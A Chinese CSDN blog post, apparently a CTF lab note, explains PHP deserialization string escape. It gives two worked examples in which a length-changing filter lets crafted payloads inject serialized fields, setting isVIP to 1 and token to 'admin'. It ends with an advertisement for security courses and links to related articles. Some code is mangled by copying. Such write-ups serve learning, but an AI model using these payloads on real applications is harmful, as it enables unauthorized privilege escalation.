php反序列化逃逸(1)

最新推荐文章于 2024-08-13 14:54:57 发布
最新推荐文章于 2024-08-13 14:54:57 发布
阅读量616 收藏 8
点赞数 5
分类专栏: 程序员 文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84969658/article/details/138776507
版权

$u = new user(“admin”,‘123456’);
u _ s e r = s e r i a l i z e ( u\_ser = serialize( u_ser=serialize(u);
//O:4:“user”:3:{s:8:“username”;s:5:“admin”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}

echo PHP_EOL;
u s = f i l t e r ( us = filter( us=filter(u_ser);
//O:4:“user”:3:{s:8:“username”;s:5:“hacker”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}

//过滤前,过滤后
//O:4:“user”:3:{s:8:“username”;s:5:“admin”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}
//O:4:“user”:3:{s:8:“username”;s:5:“hacker”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}

$u = new user(‘admin";s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:1;}’,“123456”);
//O:4:“user”:3:{s:8:“username”;s:52:“admin”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}";s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}

//";s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;} is length of 47

$u = new user(‘adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:1;}’,“123456”);
u _ s e r = s e r i a l i z e ( u\_ser = serialize( u_ser=serialize(u);
f i l t e r t e d = f i l t e r ( filterted = filter( filterted=filter(u_ser);
//O:4:“user”:3:{s:8:“username”;s:282:“hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker”;s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}";s:8:“password”;s:6:“123456”;s:5:“isVIP”;i:0;}
//forget of modify value of vip, it should be (int)1

o b j = u n s e r i a l i z e ( obj = unserialize( obj=unserialize(filterted);
var_dump($obj);


最终的目的是修改对象的isVIP属性为1,通过反序列化


对象u进行序列化,很正常


us对u的内容作替换,将admin替换为hacker,长度不一样,有逃逸风险  
 比如  
 `s:5:"hacker";`就是这个属性看5位,将它反序列化,内容就变成了hacke,r就逃逸了  
 原因是它本来是admin是5位,通过过滤直接替换,造成纰漏


尝试构造payload  
 `$u = new user('admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}',"123456");`  
 其中`";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}`是截取出来的


尝试逃逸  
 `$u = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}',"123456");`这么多重复的admin都将被替换为hacker。admin有282个字符,全部替换为hacker后就有了逃逸的条件。让原来的序列化内容容纳下`";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}`,而长度还是282,就是读到`";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}`就结束,在反序列化时形成一个完整的对象


这样一来就可在var\_dump看到isVIP属性确实遭到更改`var_dump($obj);`


## 第二段说明
<?php class message{ public $from; public $msg; public $to; public $token='user'; public function \_\_construct($f,$m,$t){ $this->from = $f; $this->msg = $m; $this->to = $t; } } $obj = new message('fuck','b','c'); function filter($obj){ return str\_replace('fuck', 'loveU', $obj); } $objSer = serialize($obj); echo $objSer; //O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";} echo PHP\_EOL; $objSerFil = filter($objSer); echo $objSerFil; //O:7:"message":4:{s:4:"from";s:4:"loveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";} //could flee //";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";} //fix it to //";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";} //payload(62 char) //";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";} echo PHP\_EOL; $objHack = new message('fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}','b','c'); echo serialize($objHack); $answer = 'O:7:"message":4:{s:4:"from";s:310:"fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}'; $answer = filter($answer); echo PHP\_EOL; var\_dump(unserialize($answer)); //it works echo PHP\_EOL; echo base64\_encode($answer); ``` 这段代码来自我做ctfshow线上靶场时的记录,看上去更清晰一些吧 结合注释观察,很容易懂 结合writeup的视频的建议,新手慢点写,是容易做对的 ## 最后 **自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。** **深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!** **因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。** ![img](https://img-blog.csdnimg.cn/img_convert/1286fb9c97828c2e4b8c07c063a52670.png) ![img](https://img-blog.csdnimg.cn/img_convert/9f6696dc309f5fb761ddfcb8d7cb603e.png) ![img](https://img-blog.csdnimg.cn/img_convert/f234c4bedb519284f4b274d040229688.png) ![img](https://img-blog.csdnimg.cn/img_convert/647ddc52bedcbe7a21a475a290a89e5a.png) ![img](https://img-blog.csdnimg.cn/img_convert/2e4482b87b19dfc48a0914765765308c.png) **既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!** [**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875) **由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!** 你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875) **由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84969658
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
php反序列化逃逸1
08-03
在安全领域,PHP反序列化逃逸是一个重要的安全问题,因为不正确的处理序列化数据可能导致代码执行漏洞。以下是关于“php反序列化逃逸”的详细解释: 1. **反序列化分隔符**: PHP反序列化的结束标记是`;}`,这意味...
php反序列化漏洞1
08-04
PHP反序列化漏洞是一种安全问题,它出现在PHP代码中对序列化对象进行反序列化时,如果对象的某些属性或方法可以被恶意控制,就可能导致意外的行为,甚至执行任意系统命令。这种漏洞通常源于对反序列化过程的不正确...
php反序列化字符逃逸
leekos的博客,分享web安全相关知识~
01-04 1225
php反序列化字符逃逸
PHP反序列化字符串逃逸
Aiwin的博客
01-10 913
PHP反序列化字符串逃逸
php反序列化逃逸
m0_63416413的博客
04-25 511
ctf反序列化逃逸,结合代码和ctf题目
CTF-PHP反序列化漏洞5-反序列化字符逃逸
Eason_LYC安全白帽子的成长博客
05-15 1839
PHP反序列化漏洞是指攻击者通过构造恶意序列化数据,使得PHP反序列化函数在反序列化时执行了恶意代码,从而导致安全漏洞。其中,反序列化字符逃逸是指攻击者在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。具体来说,PHP反序列化函数在反序列化时,会对序列化字符串中的特殊字符进行转义,例如将双引号转义为\”、将反斜杠转义为\等。攻击者可以利用这个特性,在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。?
CTF:PHP反序列化字符逃逸漏洞
06-16 1370
作者:高玉涵 博客:blog.csdn.net/cg_i 时间:2021.6.16 22:26、。/>/ CTF入门好难 赛后,主办方给出答案后的第77天,我终于解开了这道题。 CTF作为流行在信息安全界著名竞赛,像我这种“被赶鸭子上架的程序员”——零基础。答案都看不懂,我太难了!不了解原理和背景,资料也无从找起。输了比赛不可怕,就怕输的不明不白,抱着这种不甘,也为了探究缘故,除了努力学习别无它法,期间走了不少弯路,终得解惑。这对于我来说,没有激动与喜悦,有得只是深刻。 现将解题过程分享出
php反序列化字符串逃逸
fmyyy1的博客
04-19 451
最近经常碰到反序列化改变长度的逃逸问题,写篇笔记记一下。 在反序列化前,若对序列化的字符串进行一些替换关键字操作,如果改变了长度,则会导致一些安全问题。 在讨论这个前得先理解php反序列化时的截断问题,举例: <?php $a = 'a:3:{i:0;s:3:"123";i:1;s:3:"abc";i:2;s:4:"defg";}'; $b = 'a:3:{i:0;s:3:"123";i:1;s:3:"abc";i:2;s:5:"qwert";};i:2;s:4:"defg";}'; var_dump
PHP反序列化字符逃逸
xiao_he0123的博客
03-16 678
PHP序列化和反序列化前言一、PHP序列化(serialize)二、PHP反序列化(unserialize)三、魔幻函数四、PHP反序列化字符逃逸1.替换修改后导致序列化字符串变长2.替换之后导致序列化字符变短 前言 一、PHP序列化(serialize) 序列化就是将变量或者对象转换为字符串的过程 #序列化结果: o:1:"A":2:{s:4:"name";s:4:"aaaa";s:4:"pass";s:6:"123456";} //o 即object简写的对象 //1 对象的字符数(这里对象是后面
反序列化字符串逃逸(上篇)
csjjjd的博客
01-21 1157
结果:O:4:"user":3:{s:8:"username";s:3:"BTG";这里BTG从0变成了1,说明你是污染成功了的,因为我的原代码里面写死了BTG是0的,现在变成了1,所以证明反序列化是成功了。其实就到这里就搞定了,如果不放心,那就var——dump,把反序列化输出出来,
PHP反序列化字符逃逸详解
qq_45521281的博客
07-05 7916
文章目录第一种情况:替换修改后导致序列化字符串变长例题——[0CTF 2016]piapiapia第二种情况——替换之后导致序列化字符串变短实例——[安洵杯 2019]easy_serialize_php 此类题目的本质就是改变序列化字符串的长度,导致反序列化漏洞 这种题目有个共同点: php序列化后的字符串经过了替换或者修改,导致字符串长度发生变化。 总是先进行序列化,再进行替换修改操作。 第一种情况:替换修改后导致序列化字符串变长 示例代码: <?php function filter($st
php反序列化字符逃逸,PHP反序列化字符串逃逸
weixin_31008279的博客
03-26 231
经过CTF比赛了解PHP反序列化,记录本身的学习。借用哈大佬们的名言任何具备必定结构的数据,若是通过了某些处理而把结构体自己的结构给打乱了,则有可能会产生漏洞。0CTF 2016piapiapia-----反序列化后长度递增安询杯2019-easy_serialize_php-----反序列化后长度递减0CTF 2016piapiapia因为是代码审计,直接访问www.zip发现备份的源码,有一下...
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
shiro反序列化测试工具.zip
06-04
在网络安全领域,"反序列化漏洞"是一种常见的安全问题,攻击者可以通过构造恶意的序列化数据来执行远程代码或者获取敏感信息。Shiro框架在处理用户认证和授权时可能会涉及对象的序列化和反序列化,因此也可能存在...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
文件上传-.user.ini利用
最新发布
feiwujiushiwo的博客
08-13 185
php.ini是php的全局配置文件,对整个web服务起作用.user.ini和.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
zabbix的setup无法进入第二步
houduanq的博客
08-11 465
chmod: 无法访问"/var/lib/php/session": 没有那个文件或目录。
thinkphp漏洞之sql注入漏洞-builder处漏洞
banliyaoguai的博客
08-09 571
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
[FSCTF 2023]细狗2.0
2301_81462177的博客
08-09 321
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
PHP反序列化逃逸详解与示例
"php反序列化逃逸1" 在PHP中,序列化和反序列化是两种常见的数据存储和传输方式。序列化将对象转换为字符串,以便存储或通过网络发送,而反序列化则将字符串恢复为原始的PHP对象。在特定情况下,不正确的反序列化...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值